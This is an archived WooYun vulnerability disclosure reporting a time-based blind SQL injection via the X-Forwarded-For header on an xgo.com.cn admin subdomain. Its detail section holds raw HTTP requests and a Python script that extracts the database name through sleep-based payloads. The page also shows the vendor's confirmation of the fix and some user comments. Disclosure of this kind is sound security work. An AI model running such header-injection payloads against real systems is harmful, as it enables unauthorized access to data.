当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122565

漏洞标题:汽车点评某重要站点SQL注入之智取南郡

相关厂商:xgo.com.cn

漏洞作者: 路人甲

提交时间:2015-06-24 22:09

修复时间:2015-08-09 10:44

公开时间:2015-08-09 10:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-24: 细节已通知厂商并且等待厂商处理中
2015-06-25: 厂商已经确认,细节仅向厂商公开
2015-07-05: 细节向核心白帽子及相关领域专家公开
2015-07-15: 细节向普通白帽子公开
2015-07-25: 细节向实习白帽子公开
2015-08-09: 细节向公众公开

简要描述:

233

详细说明:

subadmin.xgo.com.cn
某后台系统。
GET /checkcode.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
X-Forwarded-For: *
X-Requested-With: XMLHttpRequest
Referer: subadmin.xgo.com.cn
Host: subadmin.xgo.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
2,
GET /checkcode.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Client-IP: *
X-Requested-With: XMLHttpRequest
Referer: subadmin.xgo.com.cn
Host: subadmin.xgo.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*


import httplib
import time
import urllib
import urllib2
headers = {"User-agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36",
"Accept": "*/*",
"Accept-Encoding" : "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Connection": "keep-alive",
"Host":"subadmin.xgo.com.cn",
"X-Forwarded-For":"a",
"Referer":"subadmin.xgo.com.cn",
"X-Requested-With":"XMLHttpRequest"}
print 'start to retrive MySQL database:'
user = ''
for i in range(1,10):
flag = 0
for payload in range(97,123):
try:
s = "aa'XOR(if(ascii(mid(lower(database()),%s,1))=%s,sleep(2),0))OR'bbb" % (i,payload)
start_time = time.time()
headers["X-Forwarded-For"]=s
conn = httplib.HTTPConnection('subadmin.xgo.com.cn', timeout=5)
s = "/checkcode.php"
conn.request(method='GET',url=s,headers=headers)
data3 = conn.getresponse().read()

except:
continue
if (time.time() - start_time > 2) and (time.time() - start_time < 3):
user += str(payload)
user += "_"
print '\n[in progress]', user
flag=1
break
else:
pass
if flag==0:
user += "*_"
print '\nMySQL database is', user

漏洞证明:

20150624210229.png


把对应ascii映射过来:
database: xgo_sub_p

修复方案:

~~~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-25 10:43

厂商回复:

感谢指教已经修复了

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-25 11:22 | 大亮 ( 普通白帽子 | Rank:306 漏洞数:65 | 慢慢挖洞)

    @紫霞仙子,为什么你一直用匿名啊?

  2. 2015-06-25 11:26 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    @大亮 不好意思弄的漏洞列表里面都是我的身影。

  3. 2015-06-25 11:32 | 大亮 ( 普通白帽子 | Rank:306 漏洞数:65 | 慢慢挖洞)

    @紫霞仙子 就是那样才能显示出牛x啊

  4. 2015-06-25 11:41 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    @大亮 只想安安静静的挖洞。